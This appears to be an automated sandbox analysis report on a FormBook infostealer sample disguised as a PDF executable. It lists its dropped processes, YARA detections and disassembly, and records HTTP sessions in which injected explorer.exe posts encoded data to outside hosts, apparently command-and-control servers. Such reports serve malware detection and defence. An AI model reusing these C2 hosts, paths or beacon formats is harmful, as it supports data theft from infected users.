                                                                                          Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.pgatraining.com/qsni/?C6=ylLL+a8J%2F3JJvCdIraNgF6BSXSl8NPtUrBXqEYbPGkQO18qlBvsQ7giWAZIzNvf1UZKYMEb3cvhxf0GhUtqt7EXDK++t1UbmIuhNRAnUxFPd&ZOm=dXna0d&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY4MDE3MjAyNCwiaWF0IjoxNjgwMTY0ODI0LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydDhpYTBjaDkya2EzYnUzZW8ybDZwdWMiLCJuYmYiOjE2ODAxNjQ4MjQsInRzIjoxNjgwMTY0ODI0NjQ4NTE5fQ.lrFtykCLafMxow2Yxikq1uWArHAZGl53f2T80j0cjto&sid=a6e03556-ced4-11ed-b97f-5ad254eadb88');</script></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          6192.168.2.64971381.17.29.15080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:04.630667925 CEST112OUTGET /qsni/?ZOm=dXna0d&C6=ylLL+a8J/3JJvCdIraNgF6BSXSl8NPtUrBXqEYbPGkQO18qlBvsQ7giWAZIzNvf1UZKYMEb3cvhxf0GhUtqt7EXDK++t1UbmIuhNRAnUxFPd HTTP/1.1
                                                                                          Host: www.pgatraining.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:24:04.656905890 CEST113INHTTP/1.1 200 OK
                                                                                          accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 610
                                                                                          content-type: text/html; charset=utf-8
                                                                                          date: Thu, 30 Mar 2023 08:24:04 GMT
                                                                                          server: nginx
                                                                                          set-cookie: sid=3b94c028-ced4-11ed-a640-5ad2043c3b2a; path=/; domain=.pgatraining.com; expires=Tue, 17 Apr 2091 11:38:11 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 70 67 61 74 72 61 69 6e 69 6e 67 2e 63 6f 6d 2f 71 73 6e 69 2f 3f 43 36 3d 79 6c 4c 4c 2b 61 38 4a 25 32 46 33 4a 4a 76 43 64 49 72 61 4e 67 46 36 42 53 58 53 6c 38 4e 50 74 55 72 42 58 71 45 59 62 50 47 6b 51 4f 31 38 71 6c 42 76 73 51 37 67 69 57 41 5a 49 7a 4e 76 66 31 55 5a 4b 59 4d 45 62 33 63 76 68 78 66 30 47 68 55 74 71 74 37 45 58 44 4b 2b 2b 74 31 55 62 6d 49 75 68 4e 52 41 6e 55 78 46 50 64 26 5a 4f 6d 3d 64 58 6e 61 30 64 26 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 34 4d 44 45 33 4d 54 67 30 4e 43 77 69 61 57 46 30 49 6a 6f 78 4e 6a 67 77 4d 54 59 30 4e 6a 51 30 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 44 68 70 4f 57 78 30 4e 33 49 30 5a 32 59 77 4e 33 56 68 61 6a 41 79 61 33 4e 78 59 57 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4f 44 41 78 4e 6a 51 32 4e 44 51 73 49 6e 52 7a 49 6a 6f 78 4e 6a 67 77 4d 54 59 30 4e 6a 51 30 4e 6a 4d 34 4e 44 55 78 66 51 2e 6f 48 41 34 43 77 41 54 7a 5f 4f 4a 75 45 67 34 76 49 4c 56 66 30 71 71 39 61 35 36 34 43 32 66 51 6c 35 63 79 55 6e 2d 72 4f 45 26 73 69 64 3d 33 62 39 34 63 30 32 38 2d 63 65 64 34 2d 31 31 65 64 2d 61 36 34 30 2d 35 61 64 32 30 34 33 63 33 62 32 61 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.pgatraining.com/qsni/?C6=ylLL+a8J%2F3JJvCdIraNgF6BSXSl8NPtUrBXqEYbPGkQO18qlBvsQ7giWAZIzNvf1UZKYMEb3cvhxf0GhUtqt7EXDK++t1UbmIuhNRAnUxFPd&ZOm=dXna0d&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY4MDE3MTg0NCwiaWF0IjoxNjgwMTY0NjQ0LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydDhpOWx0N3I0Z2YwN3VhajAya3NxYWMiLCJuYmYiOjE2ODAxNjQ2NDQsInRzIjoxNjgwMTY0NjQ0NjM4NDUxfQ.oHA4CwATz_OJuEg4vILVf0qq9a564C2fQl5cyUn-rOE&sid=3b94c028-ced4-11ed-a640-5ad2043c3b2a');</script></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          7192.168.2.649714199.231.66.20480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:10.002274990 CEST115OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.dammar.net
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.dammar.net
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.dammar.net/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 79 41 38 37 64 2d 54 5f 57 58 36 4c 33 4c 34 4a 39 6c 45 72 54 4b 4a 49 31 59 33 74 4a 61 4d 46 70 71 38 46 6c 63 6f 4c 28 47 38 43 57 4c 47 69 6f 36 79 2d 31 6a 69 48 51 41 4f 65 36 5f 50 76 41 6d 70 5a 7e 5f 4d 55 31 4e 5a 4b 41 72 38 4f 55 64 54 46 42 46 67 78 69 63 7e 4a 69 51 6a 6b 77 35 78 4f 53 44 4d 48 50 57 57 6c 73 55 4f 57 55 37 34 38 58 5a 74 53 6b 67 71 2d 32 38 78 6a 6f 32 77 44 66 4c 33 4c 47 45 75 55 71 4d 58 70 68 4d 68 6c 77 75 64 2d 35 4d 65 58 75 46 6c 63 4a 69 28 64 44 55 61 50 7a 4a 32 66 69 4f 28 5a 62 4f 74 36 6e 58 49 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=yA87d-T_WX6L3L4J9lErTKJI1Y3tJaMFpq8FlcoL(G8CWLGio6y-1jiHQAOe6_PvAmpZ~_MU1NZKAr8OUdTFBFgxic~JiQjkw5xOSDMHPWWlsUOWU748XZtSkgq-28xjo2wDfL3LGEuUqMXphMhlwud-5MeXuFlcJi(dDUaPzJ2fiO(ZbOt6nXI.
                                                                                          Mar 30, 2023 10:24:10.197375059 CEST115INHTTP/1.0 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:24:10 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          8192.168.2.649715199.231.66.20480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:12.860430956 CEST117OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.dammar.net
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.dammar.net
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.dammar.net/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 79 41 38 37 64 2d 54 5f 57 58 36 4c 33 71 49 4a 7e 47 38 72 53 71 4a 4a 36 34 33 74 44 36 4d 42 70 71 77 46 6c 5a 51 68 7e 31 4d 43 57 34 7e 69 70 66 65 2d 6c 54 69 48 57 41 50 58 31 66 50 39 41 6d 38 6f 7e 5f 63 2d 31 50 56 4b 42 4b 73 4f 63 37 48 47 50 56 67 7a 6d 63 7e 4f 69 51 69 67 77 35 68 43 53 44 41 39 50 57 4f 6c 73 47 57 57 66 72 34 37 62 35 74 53 6b 67 71 69 32 38 78 44 6f 79 63 68 66 4b 76 39 48 7a 57 55 71 75 66 70 73 50 4a 6d 67 75 64 36 6c 63 66 68 7e 48 6b 45 4f 68 75 62 4a 55 79 65 74 63 6e 79 6e 63 57 77 66 64 74 61 39 51 46 6c 6a 6e 74 65 76 66 79 77 57 56 73 65 35 5f 70 31 4b 35 46 4e 6b 77 43 77 52 34 5a 4f 44 7a 64 53 37 44 45 4d 47 79 59 54 44 31 33 78 51 49 63 6e 37 53 51 53 36 51 67 59 33 37 77 73 78 43 37 4a 33 31 70 76 49 63 61 30 7a 71 50 45 63 4e 57 74 59 4b 55 37 71 73 38 58 72 49 43 50 59 64 63 67 52 68 33 4d 47 71 56 31 31 43 63 32 30 63 57 54 7e 69 6e 58 6c 36 65 56 73 4b 4b 36 31 73 69 48 62 7a 59 7a 37 4b 44 53 4d 52 6f 65 6e 61 48 56 6f 42 43 63 6d 43 34 45 6d 77 73 4e 45 73 72 42 64 73 35 73 54 51 4c 68 4a 32 31 68 65 67 38 52 5a 73 75 59 36 41 43 4e 4f 46 51 69 44 51 62 34 71 2d 43 4d 43 64 6a 44 6a 31 64 6d 69 56 42 62 42 5a 78 55 44 72 55 5a 6b 59 6b 62 51 35 39 41 49 72 69 72 44 6b 4b 37 64 66 6d 36 43 46 6c 47 75 53 70 66 50 54 70 32 44 59 4b 4b 42 6e 73 78 48 34 35 2d 39 5a 68 54 4b 67 39 32 56 55 65 6a 78 30 69 55 77 41 74 68 6a 6d 61 35 7a 71 64 4e 30 4b 56 49 72 47 76 53 35 79 78 4a 7a 75 4e 65 71 79 6b 79 44 66 65 66 34 46 31 6a 4d 4e 48 70 32 49 35 48 69 2d 6c 4a 47 54 57 63 58 51 6b 36 50 64 47 5a 6b 56 38 47 68 78 72 73 38 4b 64 69 59 68 4e 55 6c 41 36 33 37 46 46 7a 67 51 46 54 4e 6b 30 50 71 47 56 45 78 65 76 52 46 47 47 32 6e 30 4d 45 4b 4f 55 55 74 7a 54 57 45 46 44 49 4e 72 5a 42 5a 39 65 6c 79 71 62 48 6e 42 78 37 50 78 4c 56 56 31 35 70 58 48 4c 59 62 61 36 30 70 79 71 41 70 61 65 71 7a 50 49 66 70 77 42 43 45 41 35 55 48 4b 62 44 52 6a 34 6f 59 74 35 6d 50 2d 79 67 57 74 50 67 39 47 4f 68 4c 44 74 50 7e 64 32 68 70 6a 64 4b 31 77 6e 31 74 6c 61 36 45 54 65 73 4f 47 34 55 6a 63 7e 4a 7e 76 49 56 57 39 35 58 56 7a 78 55 65 44 62 38 47 52 55 7a 74 43 7e 51 72 36 33 64 63 33 64 59 66 70 77 4c 77 79 4c 38 57 79 4a 2d 47 4b 66 76 44 46 53 69 57 30 70 78 72 59 6a 74 6d 46 37 34 48 68 64 69 31 69 46 61 4c 48 30 6b 6b 58 47 2d 56 38 66 36 6a 78 79 47 70 6f 33 4c 34 64 33 65 31 49 79 36 55 49 4d 4d 46 74 7e 79 71 38 58 71 56 66 77 39 6b 62 7a 6b 7e 5a 6b 42 6a 32 6d 50 6f 4e 35 38 62 51 66 6f 38 5f 4e 75 4e 32 34 4c 54 37 64 48 44 42 48 79 79 32 45 42 5a 31 28 6f 28 45 32 5a 39 47 6d 4c 30 63 4a 38 43 44 76 4d 41 6f 6a 30 36 34 75 64 47 43 45 42 59 4d 71 6f 67 43 49 61 53 59 44 31 77 4b 77 31 63 2d 64 4a 70 77 72 4e 4c 54 44 61 56 52 4d 70 68 57 39 57 74 77 47 43 50 59 63 47 56 73 59 2d 59 7a 4c 77 71 64 4a 59 41 32 76 65 41 69 4c 6b 4e 41 6e 35 54 41 37 57 7e 55 5a 59 55 2d 6c 78 7a 39 78 66 6b 46 67 49 52 63 4d 6a 4a 57 39 46 34 56 30 4b 6c 73 54 33 6c 64 45 6a 7e 39 45 4b 58 6c 47 53 34 52 34 2d 77 36 77 6b 61 4e 7e 47 7a 65 77 5a 6b 67 53 7a 42 61 7e 45 75 52 50 78 32 75 43 68 72 36 75 68 77 68 67 57 66 46 54 72 76 6a 45 35 79 7a 56 6c 49 36 67 62 4c 71 6f 67 69 76 61 33 75 46 34 46 57 4b 55 67 69 64 62 6e 64 76 56 57 30 68 39 6c 77 62 6c 68 64 76 39 4d 69 4b 38 69 7a 45 73 41 79 79 77 65 6f 61 4d 66 70 66 6d 4b 6d 71 6b 4c 58 56 45 55 63 6b 79 55 66 4a 52 75 37 2d 52 31 56 37 6b 43 59 52 4e 62 58 56 31 49 58 6d 70 77 6b 76 53 55 57 44 51 57 43 71 78 4c 28 62 43 36 33 42 32 7a 44 6e 46 53 61 64 42 53 57 6f 4f 7a 36 36 72 48 4c 65 63 51 30 62 39 6c 69 57 75 38 4e 51 50 70 54 56 63 75 78 32 4f 6f 7e 37 55 6c 4e 4f 61 75 4a 4c 6a 7a 4f 6d 67 45 78 62 72 5a 50 68 35 57 75 71 70 50 4c 72 5a 54 4b 59 6e 46 4a 33 6c 37 39 59 4c 43 63 75 37 43 6d 43 4b 34 7e 72 75 45 31 74 73 43 77 73 7a 43 49 64 28 51 74 35 37 42 6a 71 58 6c 37 65 56 4d 64 6f 67 54 48 41 62 49 51 66 52 4e 78 78 50 58 62 46 4a 49 34 35 6e 42 6f 51 47 4d 32 4f 6f 6b 58 47 43 32 50 58 68 76 78 77 59 5a 70 34 59 4c 76 4b 77 4e 6a 37 46 76 28 6d 5a 52 57 68 67 46 58 33 7a 64 54 35 52 69 41 70 4e 32
                                                                                          Data Ascii: C6=yA87d-T_WX6L3qIJ~G8rSqJJ643tD6MBpqwFlZQh~1MCW4~ipfe-lTiHWAPX1fP9Am8o~_c-1PVKBKsOc7HGPVgzmc~OiQigw5hCSDA9PWOlsGWWfr47b5tSkgqi28xDoychfKv9HzWUqufpsPJmgud6lcfh~HkEOhubJUyetcnyncWwfdta9QFljntevfywWVse5_p1K5FNkwCwR4ZODzdS7DEMGyYTD13xQIcn7SQS6QgY37wsxC7J31pvIca0zqPEcNWtYKU7qs8XrICPYdcgRh3MGqV11Cc20cWT~inXl6eVsKK61siHbzYz7KDSMRoenaHVoBCcmC4EmwsNEsrBds5sTQLhJ21heg8RZsuY6ACNOFQiDQb4q-CMCdjDj1dmiVBbBZxUDrUZkYkbQ59AIrirDkK7dfm6CFlGuSpfPTp2DYKKBnsxH45-9ZhTKg92VUejx0iUwAthjma5zqdN0KVIrGvS5yxJzuNeqykyDfef4F1jMNHp2I5Hi-lJGTWcXQk6PdGZkV8Ghxrs8KdiYhNUlA637FFzgQFTNk0PqGVExevRFGG2n0MEKOUUtzTWEFDINrZBZ9elyqbHnBx7PxLVV15pXHLYba60pyqApaeqzPIfpwBCEA5UHKbDRj4oYt5mP-ygWtPg9GOhLDtP~d2hpjdK1wn1tla6ETesOG4Ujc~J~vIVW95XVzxUeDb8GRUztC~Qr63dc3dYfpwLwyL8WyJ-GKfvDFSiW0pxrYjtmF74Hhdi1iFaLH0kkXG-V8f6jxyGpo3L4d3e1Iy6UIMMFt~yq8XqVfw9kbzk~ZkBj2mPoN58bQfo8_NuN24LT7dHDBHyy2EBZ1(o(E2Z9GmL0cJ8CDvMAoj064udGCEBYMqogCIaSYD1wKw1c-dJpwrNLTDaVRMphW9WtwGCPYcGVsY-YzLwqdJYA2veAiLkNAn5TA7W~UZYU-lxz9xfkFgIRcMjJW9F4V0KlsT3ldEj~9EKXlGS4R4-w6wkaN~GzewZkgSzBa~EuRPx2uChr6uhwhgWfFTrvjE5yzVlI6gbLqogiva3uF4FWKUgidbndvVW0h9lwblhdv9MiK8izEsAyyweoaMfpfmKmqkLXVEUckyUfJRu7-R1V7kCYRNbXV1IXmpwkvSUWDQWCqxL(bC63B2zDnFSadBSWoOz66rHLecQ0b9liWu8NQPpTVcux2Oo~7UlNOauJLjzOmgExbrZPh5WuqpPLrZTKYnFJ3l79YLCcu7CmCK4~ruE1tsCwszCId(Qt57BjqXl7eVMdogTHAbIQfRNxxPXbFJI45nBoQGM2OokXGC2PXhvxwYZp4YLvKwNj7Fv(mZRWhgFX3zdT5RiApN2hFUWKJPHqHvAzUwwwgHh(Y9IaBlXKOj3iAspUXeDWj7yGrMDyAfd7rNq0iKIPcLJHHiqr8qd~4s1HdrwF4LOuGs.
                                                                                          Mar 30, 2023 10:24:13.057002068 CEST118INHTTP/1.0 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:24:12 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          9192.168.2.649716199.231.66.20480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:15.581645012 CEST118OUTGET /qsni/?C6=/CUbeLGdGW7zl6Yrg3szV70J26SXMoQ2pfYL+bcx2mg0PIzThOL5knKcXzWm1tDlAVZWmNl686ZiGeZ8WLzQG28uiNuGoArcmZEyTk8QSRXO&ZOm=dXna0d HTTP/1.1
                                                                                          Host: www.dammar.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:24:15.776103973 CEST118INHTTP/1.0 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:24:15 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:10:22:57
                                                                                          Start date:30/03/2023
                                                                                          Path:C:\Users\user\Desktop\TTCopy-240323-PDF.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\TTCopy-240323-PDF.exe
                                                                                          Imagebase:0x400000
                                                                                          File size:300661 bytes
                                                                                          MD5 hash:348E51874930DB41B232A0BAB0A4C040
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:10:22:57
                                                                                          Start date:30/03/2023
                                                                                          Path:C:\Users\user\AppData\Local\Temp\gkvlc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi
                                                                                          Imagebase:0x400000
                                                                                          File size:87040 bytes
                                                                                          MD5 hash:ED08DE264DF3804BADFB2EF7CC487893
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:10:22:57
                                                                                          Start date:30/03/2023
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6da640000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:10:22:59
                                                                                          Start date:30/03/2023
                                                                                          Path:C:\Users\user\AppData\Local\Temp\gkvlc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\gkvlc.exe
                                                                                          Imagebase:0x400000
                                                                                          File size:87040 bytes
                                                                                          MD5 hash:ED08DE264DF3804BADFB2EF7CC487893
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:10:23:06
                                                                                          Start date:30/03/2023
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                          Imagebase:0x7ff647860000
                                                                                          File size:3933184 bytes
                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:10:23:20
                                                                                          Start date:30/03/2023
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Imagebase:0xe60000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          Reputation:high

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:15.9%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:16.4%
                                                                                            Total number of Nodes:1385
                                                                                            Total number of Limit Nodes:25
                                                                                            execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 